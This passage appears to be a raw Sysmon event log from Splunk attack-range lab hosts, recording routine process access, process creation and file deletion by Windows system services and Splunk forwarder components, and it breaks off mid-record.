10341000x8000000000000000220316Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220315Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220314Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220313Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220312Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-1635-6216-E604-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220311Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.212{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1635-6216-E604-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220310Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:45.213{4F8D34B0-1635-6216-E604-000000003902}996C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000220327Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:46.946{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A1B918DEF295642B9749D93924912EB,SHA256=24FE23E3F1F5B9A17482BEA64D4136DBBD6E33AF0A14D6C3D340CA22770ED79D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296310Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:46.377{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18BD5A74EA6C941CD76101569B55DC82,SHA256=CF28296A3D6474F095ED071231C7525F3A5ACFF0633554313E404A18E7AAF8EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000220326Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:46.446{4F8D34B0-F11D-6215-2300-000000003902}2036NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=C796F5788518CF0F57AB5C87207C5D14,SHA256=0CE7095FECB35749AB15D15586D728EDDAEC94009FC3FB4FCEDC790B064FF951,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296309Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:46.185{C8EA50B7-F130-6215-2F00-000000003802}2588NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-03cdc2690a17b3e8a\channels\health\respondent-20220223083251-153MD5=A38EB58E8C6680789F1AEA0022EC0210,SHA256=7B5C3F2ACD9B17C99423AC4BB2B0CFD455B3A71F8C48567BF2A051FF8E6D4921,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000296312Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:10:47.378{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=61DBE04C7F81A0EC18A4003904A276EE,SHA256=870BC72E827BADC95039A4C8BFFB624D8183DBBDB0438C77371A19C6A21AE3FF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000220354Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1637-6216-E804-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220353Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220352Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220351Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220350Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220349Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220348Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220347Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220346Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220345Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220344Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1637-6216-E804-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000220343Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.774{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1637-6216-E804-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000220342Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.775{4F8D34B0-1637-6216-E804-000000003902}3392C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x8000000000000000220341Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.308{4F8D34B0-1637-6216-E704-000000003902}2408956C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220340Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1637-6216-E704-000000003902}2408C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220339Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220338Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:10:47.103{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000220337Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 